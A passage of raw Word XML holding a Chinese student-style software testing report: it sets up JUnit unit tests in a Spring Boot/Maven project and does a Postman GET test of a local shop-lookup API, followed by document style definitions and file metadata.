          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4212454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3、工具探索</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192E686D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单元测试：选择JUnit(Java)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01281510">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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本测试借助于springBoot框架并使用Maven项目管理工具引入JUnit坐标</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED4C404">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="1224280"/>
            <wp:effectExtent l="0" t="0" r="635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D40B1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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在test文件下的softTest包下创建testJUnit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECA05B3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创建一个简单的测试类以便于后面的测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42445655">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="1287780"/>
            <wp:effectExtent l="0" t="0" r="63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98DD6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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在testJunit中进行测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C17D8A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2423795"/>
            <wp:effectExtent l="0" t="0" r="635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1FF88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27575618">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left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2、API测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F53D61D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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利用java学习项目进行API的测试，首先使用启动类启动项目，项目为点评类项目</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E59F2C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400550" cy="1536700"/>
            <wp:effectExtent l="0" t="0" r="381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02221">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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对项目其中一个接口进行API测试，这里选择对商铺根据id查询接口。打开Postman，输入请求的接口地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B9FF52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487295"/>
            <wp:effectExtent l="0" t="0" r="635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AF759">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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根据GET方式请求本地地址，获取数据的回显</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EC7CF9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267325" cy="1609725"/>
            <wp:effectExtent l="0" t="0" r="5715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35593">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:num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4、返回数据未缺失，格式正确，测试合格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0B979F"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="A20B979F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D5D3B0E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="BD5D3B0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066554C"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F066554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EB3A2B3"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="6EB3A2B3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74C1A997"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="74C1A99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940FEC"/>
    <w:rsid w:val="22146859"/>
    <w:rsid w:val="267728AE"/>
    <w:rsid w:val="51FE5112"/>
    <w:rsid w:val="68CD2DF1"/>
    <w:rsid w:val="6D3C0C55"/>
    <w:rsid w:val="704E2C05"/>
    <w:rsid w:val="70940FEC"/>
    <w:rsid w:val="71570879"/>
    <w:rsid w:val="761D53E7"/>
    <w:rsid w:val="78957CC1"/>
    <w:rsid w:val="7A794B87"/>
    <w:rsid w:val="7DF27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rFonts w:eastAsia="黑体"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs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3484</Words>
  <Characters>6161</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>31</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>6421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2025-10-14T11:07:00Z</dcterms:created>
  <dc:creator>还是要再见啦</dc:creator>
  <cp:lastModifiedBy>温柔</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-19T08:09:17Z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2259C492DA2A495D948E679AD9EB442F_11</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOTemplateDocerSaveRecord">
    <vt:lpwstr>eyJoZGlkIjoiY2ZiMWZlMGJjYjBjYWIxNjYwY2U3NjI1MjQ1MmY0NmEiLCJ1c2VySWQiOiIxMTIxMzQ1OTIwIn0=</vt:lpwstr>
  </property>
</Properties>
</file>